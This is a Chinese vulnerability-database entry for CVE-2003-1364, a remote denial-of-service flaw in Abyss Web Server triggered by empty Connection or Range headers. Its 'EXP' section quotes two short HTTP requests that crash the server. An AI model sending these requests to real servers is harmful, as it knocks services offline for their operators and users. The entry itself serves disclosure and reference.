Abyss Webfu服务器不完整HTTP请求远程拒绝服务攻击漏洞-安全小百科

Abyss Webfu服务器不完整HTTP请求远程拒绝服务攻击漏洞

漏洞ID	1107267	漏洞类型	输入验证
发布时间	2003-04-05	更新时间	2003-12-31
CVE编号	CVE-2003-1364	CNNVD-ID	CNNVD-200312-332
漏洞平台	Windows	CVSS评分	8.5

|漏洞来源

https://www.exploit-db.com/exploits/22460
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-332

|漏洞详情

AbyssWebServer是一款免费的WEB服务程序，可使用在Windows和Linux操作系统上。AbyssWeb服务程序在处理部分不完整HTTP请求时存在问题，远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。问题存在与当AbyssWeb服务程序处理”Connection:”和”Range:”字段，由于Abyss接收到这些请求时，会读取每一个HTTP段，和每个段中的值，不但读取，而且与一些默认字符串进行对比操作，如”Connection:”字段会对比”close”还是”Keep-Alive”。因此如果攻击者提交的请求中这些字段全为空，程序就会由于内存读取错误而崩溃。

|漏洞EXP

source: http://www.securityfocus.com/bid/7287/info

A denial of service vulnerability has been reported for Abyss Web Server. The vulnerability exists when Abyss attempts to parse certain incomplete HTTP headers. 

GET / HTTP/1.0
Connection:

GET / HTTP/1.0
Range:

|参考资料

来源:BID
名称:7287
链接:http://www.securityfocus.com/bid/7287
来源:XF
名称:abyss-http-get-dos(11718)
链接:http://xforce.iss.net/xforce/xfdb/11718
来源:BUGTRAQ
名称:20030405AbyssX11.1.2remotecrash
链接:http://archives.neohapsis.com/archives/bugtraq/2003-04/0095.html
来源：NSFOCUS
名称：4667
链接：http://www.nsfocus.net/vulndb/4667

相关推荐: Nylon Proxy Receive Function Denial Of Service Vulnerability

Nylon Proxy Receive Function Denial Of Service Vulnerability 漏洞ID 1101447 漏洞类型 Design Error 发布时间 2002-10-10 更新时间 2002-10-10 CVE编号 …

文章版权归作者所有，未经允许请勿转载。

THE END